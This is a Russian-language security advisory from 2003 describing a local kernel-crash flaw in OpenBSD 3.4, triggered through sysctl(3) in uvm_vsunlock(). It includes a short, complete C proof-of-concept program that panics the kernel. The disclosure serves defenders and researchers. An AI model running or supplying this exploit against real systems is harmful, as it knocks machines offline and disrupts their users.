Локальный отказ в обслуживании в ядре OpenBSD
| Дата публикации: | 24.11.2003 |
| Всего просмотров: | 1539 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| strong>Уязвимые версии: OpenBSD 3.4
Описание: Уязвимость обнаружена в OpenBSD в функции sysctl(3). Локальный пользователь может аварийно завершить работу системы. Локальный пользователь может вызвать sysctl(3) со специально сформированными параметрами, чтобы аварийно завершить работу ядра. Недостаток расположен в 'uvm_glue.c' в uvm_vsunlock(). Пример/Эксплоит:
#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>
int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}
URL производителя: http://www.openbsd.org Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | OpenBSD kernel panic, yet still O*BSD much |